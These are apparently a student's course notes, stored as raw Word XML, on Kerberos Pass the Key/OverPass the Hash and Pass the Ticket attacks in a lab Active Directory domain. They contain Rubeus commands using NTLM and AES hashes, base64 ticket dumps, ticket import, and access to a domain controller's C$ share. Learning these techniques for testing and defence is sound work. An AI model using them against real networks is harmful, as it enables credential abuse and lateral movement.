    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="1A6F613B" wp14:paraId="4E284EDD" wp14:textId="07BFAF5F">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Rubeus - Pass the Key or OverPass the Hash</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="1A6F613B" wp14:paraId="67BC66F8" wp14:textId="43E13A1F">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1A37074A" wp14:textId="0E738E6A">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asktgt /domain:inlanefreight.htb /user:plaintext /aes256:b21c99fc068e3ab2ca789bccbef67de43791fd911c6e15ead25641a8fda3fe60 /nowrap</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v1.5.0</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Ask TGT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Using rc4_hmac hash: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Building AS-REQ (w/ preauth) for: 'inlanefreight.htb\plaintext'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TGT request successful!</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="black"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>[*] base64(ticket.kirbi):</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ServiceName           :  krbtgt/inlanefreight.htb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StartTime             :  7/12/2022 11:28:26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EndTime               :  7/12/2022 9:28:26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RenewTill             :  7/19/2022 11:28:26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  name_canonicalize, pre_authent, initial, renewable, forwardable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KeyType               :  rc4_hmac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Base64(key)           :  0TOKzUHdgBQKMk8+xmOV2w==</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="1A6F613B" wp14:paraId="1656F793" wp14:textId="5723C78B">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Mimikatz requires administrative rights to perform the Pass the Key/OverPass the Hash attacks, while Rubeus doesn't.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="1A6F613B" wp14:paraId="6B204A22" wp14:textId="373A67C7">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">To learn more about the difference between Mimikatz sekurlsa::pth and Rubeus asktgt, consult the Rubeus tool documentation </w:t>
      </w:r>
      <w:hyperlink w:anchor="example-over-pass-the-hash" r:id="R46b5ac71f30c4beb">
        <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="it-IT"/>
          </w:rPr>
          <w:t>Example for OverPass the Hash</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="1A6F613B" wp14:paraId="132561C9" wp14:textId="54E00FD7">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Modern Windows domains (functional level 2008 and above) use AES encryption by default in normal Kerberos exchanges. If we use a rc4_hmac (NTLM) hash in a Kerberos exchange instead of an aes256_cts_hmac_sha1 (or aes128) key, it may be detected as an "encryption downgrade." </w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" wp14:paraId="79EBC4A2" wp14:textId="41275DFF"/>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="1A6F613B" wp14:paraId="32AC5D42" wp14:textId="4C49C969">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Pass the Ticket (PtT)</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="1A6F613B" wp14:paraId="486715AE" wp14:textId="71573AF1">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Now that we have some Kerberos tickets, we can use them to move laterally within an environment.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="1A6F613B" wp14:paraId="3EC99A90" wp14:textId="1CB2E5B1">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>With Rubeus we performed an OverPass the Hash attack and retrieved the ticket in base64 format. Instead, we could use the flag /ptt to submit the ticket (TGT or TGS) to the current logon session.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="1A6F613B" wp14:paraId="25A4B753" wp14:textId="561C3782">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Rubeus Pass the Ticket</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="1A6F613B" wp14:paraId="31890073" wp14:textId="54448DFE">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29D8B903" wp14:textId="6A913682">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asktgt /domain:inlanefreight.htb /user:plaintext /rc4:3f74aa8f08f712f09cd5177b5c1ce50f /ptt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v1.5.0</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Ask TGT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Using rc4_hmac hash: 3f74aa8f08f712f09cd5177b5c1ce50f</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="black"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>[*] Building AS-REQ (w/ preauth) for: 'inlanefreight.htb\plaintext'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TGT request successful!</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="black"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>[*] base64(ticket.kirbi):</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doIE1jCCBNKgAwIBBaEDAgEWooID+TCCA/VhggPxMIID7aADAgEFoQkbB0hUQi5DT02iHDAaoAMCAQKh</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EzARGwZrcmJ0Z3QbB2h0Yi5jb22jggO7MIIDt6ADAgESoQMCAQKiggOpBIIDpcGX6rbUlYxOWeMmu/zb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f7vGgDj/g+P5zzLbr+XTIPG0kI2WCOlAFCQqz84yQd6IRcEeGjG4YX/9ezJogYNtiLnY6YPkqlQaG1Nn</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pAQBZMIhs01EH62hJR7W5XN57Tm0OLF6OFPWAXncUNaM4/aeoAkLQHZurQlZFDtPrypkwNFQ0pI60NP2</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9H98JGtKKQ9PQWnMXY7Fc/5j1nXAMVj+Q5Uu5mKGTtqHnJcsjh6waE3Vnm77PMilL1OvH3Om1bXKNNan</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JNCgb4E9ms2XhO0XiOFv1h4P0MBEOmMJ9gHnsh4Yh1HyYkU+e0H7oywRqTcsIg1qadE+gIhTcR31M5mX</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5TkMCoPmyEIk2MpO8SwxdGYaye+lTZc55uW1Q8u8qrgHKZoKWk/M1DCvUR4v6dg114UEUhp7WwhbCEtg</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5jvfr4BJmcOhhKIUDxyYsT3k59RUzzx7PRmlpS0zNNxqHj33yAjm79ECEc+5k4bNZBpS2gJeITWfcQOp</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lQ08ZKfZw3R3TWxqca4eP9Xtqlqv9SK5kbbnuuWIPV2/QHi3deB2TFvQp9CSLuvkC+4oNVg3VVR4bQ1P</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fU0+SPvL80fP7ZbmJrMan1NzLqit2t7MPEImxum049nUbFNSH6D57RoPAaGvSHePEwbqIDTghCJMic2X</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c7YJeb7y7yTYofA4WXC2f1MfixEEBIqtk/drhqJAVXz/WY9r/sWWj6dw9eEhmj/tVpPG2o1WBuRFV72K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Qp3QMwJjPEKVYVK9f+uahPXQJSQ7uvTgfj3N5m48YBDuZEJUJ52vQgEctNrDEUP6wlCU5M0DLAnHrVl4</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Qy0qURQa4nmr1aPlKX8rFd/3axl83HTPqxg/b2CW2YSgEUQUe4SqqQgRlQ0PDImWUB4RHt+cH6D563n4</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PN+yqN20T9YwQMTEIWi7mT3kq8JdCG2qtHp/j2XNuqKyf7FjUs5z4GoIS6mp/3U/kdjVHonq5TqyAWxU</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wzVSa4hlVgbMq5dElbikynyR8maYftQk+AS/xYby0UeQweffDOnCixJ9p7fbPu0Sh2QWbaOYvaeKiG+A</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GhUAUi5WiQMDSf8EG8vgU2gXggt2Slr948fy7vhROp/CQVFLHwl5/kGjRHRdVj4E+Zwwxl/3IQAU0+ag</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GrHDlWUe3G66NrR/Jg8zXhiWEiViMd5qPC2JTW1ronEPHZFevsU0pVK+MDLYc3zKdfn0q0a3ys9DLoYJ</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8zNLBL3xqHY9lNe6YiiAzPG+Q6OByDCBxaADAgEAooG9BIG6fYG3MIG0oIGxMIGuMIGroBswGaADAgEX</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oRIEED0RtMDJnODs5w89WCAI3bChCRsHSFRCLkNPTaIWMBSgAwIBAaENMAsbCXBsYWludGV4dKMHAwUA</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QOEAAKURGA8yMDIyMDcxMjE2Mjc0N1qmERgPMjAyMjA3MTMwMjI3NDdapxEYDzIwMjIwNzE5MTYyNzQ3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WqgJGwdIVEIuQ09NqRwwGqADAgECoRMwERsGa3JidGd0GwdodGIuY29t</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="black"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>[+] Ticket successfully imported!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ServiceName           :  krbtgt/inlanefreight.htb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plaintext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StartTime             :  7/12/2022 12:27:47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EndTime               :  7/12/2022 10:27:47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RenewTill             :  7/19/2022 12:27:47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  name_canonicalize, pre_authent, initial, renewable, forwardable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KeyType               :  rc4_hmac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Base64(key)           :  PRG0wMmc4OznDz1YIAjdsA==</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="1A6F613B" wp14:paraId="070FDE67" wp14:textId="5E95C017">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Note that now it displays Ticket successfully imported!.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="1A6F613B" wp14:paraId="48AE7A92" wp14:textId="0BDBEE23">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Another way is to import the ticket into the current session using the .kirbi file from the disk.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="1A6F613B" wp14:paraId="4158F63D" wp14:textId="681270FC">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Let's use a ticket exported from Mimikatz and import it using Pass the Ticket.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="1A6F613B" wp14:paraId="29E9539E" wp14:textId="3649F7D8">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Rubeus - Pass the Ticket</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="1A6F613B" wp14:paraId="07CFE4E0" wp14:textId="67D357E2">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02C3C093" wp14:textId="60AC6199">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 xml:space="preserve">c:\tools&gt; Rubeus.exe ptt </w:t>
      </w:r>
      <w:hyperlink r:id="R8a893e4779c84f9f">
        <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:highlight w:val="black"/>
            <w:lang w:val="it-IT"/>
          </w:rPr>
          <w:t>/ticket:[0;6c680]-2-0-40e10000-plaintext@krbtgt-inlanefreight.htb.kirbi</w:t>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v1.5.0</w:t>
      </w:r>
      <w:r>
        <w:br/>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Import Ticket</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="black"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>[+] ticket successfully imported!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c:\tools&gt; dir </w:t>
      </w:r>
      <w:hyperlink r:id="R303ec42cfbb846dd">
        <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:highlight w:val="black"/>
            <w:lang w:val="it-IT"/>
          </w:rPr>
          <w:t>\\DC01.inlanefreight.htb\c$</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Directory: </w:t>
      </w:r>
      <w:hyperlink r:id="R6b8e57cd0dc247dc">
        <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:highlight w:val="black"/>
            <w:lang w:val="it-IT"/>
          </w:rPr>
          <w:t>\\dc01.inlanefreight.htb\c$</w:t>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Mode                LastWriteTime         Length Name</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="black"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>----                -------------         ------ ----</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="black"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>d-r---         6/4/2022  11:17 AM                Program Files</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="black"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>d-----         6/4/2022  11:17 AM                Program Files (x86)</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p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="1A6F613B" wp14:paraId="3B9A4631" wp14:textId="1AE94594">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>We can also use the base64 output from Rubeus or convert a .kirbi to base64 to perform the Pass the Ticket attack. We can use PowerShell to convert a .kirbi to base64.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="1A6F613B" wp14:paraId="2B82ACE4" wp14:textId="08BABBCB">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Convert .kirbi to Base64 Format</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="1A6F613B" wp14:paraId="4F55BB66" wp14:textId="678D1743">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1F46FEF1" wp14:textId="242D4E49">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="exact"/>
        <w:ind w:left="-20" w:right="-20"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>PS c:\tools&gt; [</w:t>
      </w:r>
      <w:hyperlink r:id="R7c05a15ce8914e90">
        <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="it-IT"/>
          </w:rPr>
          <w:t>Convert]::ToBase64String([IO.File]::ReadAllBytes("[0;6c680]-2-0-40e10000-plaintext@krbtgt-inlanefreight.htb.kirbi</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>"))</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>doQAAAWfMIQAAAWZoIQAAAADAgEFoYQAAAADAgEWooQAAAQ5MIQAAAQzYYQAAAQtMIQAAAQnoIQAAAADAgEFoYQAAAAJGwdIVEIuQ09NooQAAAAsMIQAAAAmoIQAAAADAgECoYQAAAAXMIQAAAARGwZrcmJ0Z3QbB0hUQi5DT02jhAAAA9cwhAAAA9GghAAAAAMCARKhhAAAAAMCAQKihAAAA7kEggO1zqm0SuXewDEmypVORXzj8hyqSmikY9gxbM9xdpmA8r2EvTnv0UYkQFdf4B73Ss5ylutsSsyvnZYRVr8Ta9Wx/fvnjpJw/T70suDA4CgsuSZcBSo/jMnDjucWNtlDc8ez6&lt;SNIP&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="1A6F613B" wp14:paraId="1E248292" wp14:textId="4BBE5F4A">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Using Rubeus, we can perform a Pass the Ticket providing the base64 string instead of the file name.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="1A6F613B" wp14:paraId="0FDF1746" wp14:textId="625390FE">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Pass the Ticket - Base64 Format</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="1A6F613B" wp14:paraId="46A95E62" wp14:textId="116BA663">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2CBBF66B" wp14:textId="03467158">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ptt /ticket:doIE1jCCBNKgAwIBBaEDAgEWooID+TCCA/VhggPxMIID7aADAgEFoQkbB0hUQi5DT02iHDAaoAMCAQKhEzARGwZrcmJ0Z3QbB2h0Yi5jb22jggO7MIIDt6ADAgESoQMCAQKiggOpBIIDpY8Kcp4i71zFcWRgpx8ovymu3HmbOL4MJVCfkGIrdJEO0iPQbMRY2pzSrk/gHuER2XRLdV/&lt;SNIP&gt;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v1.5.0</w:t>
      </w:r>
      <w:r>
        <w:br/>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Import Ticket</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="black"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>[+] ticket successfully imported!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c:\tools&gt; dir </w:t>
      </w:r>
      <w:hyperlink r:id="R42345deca23c47c7">
        <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:highlight w:val="black"/>
            <w:lang w:val="it-IT"/>
          </w:rPr>
          <w:t>\\DC01.inlanefreight.htb\c$</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Directory: </w:t>
      </w:r>
      <w:hyperlink r:id="R77870d6cac7940f2">
        <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
            <w:noProof w:val="0"/>
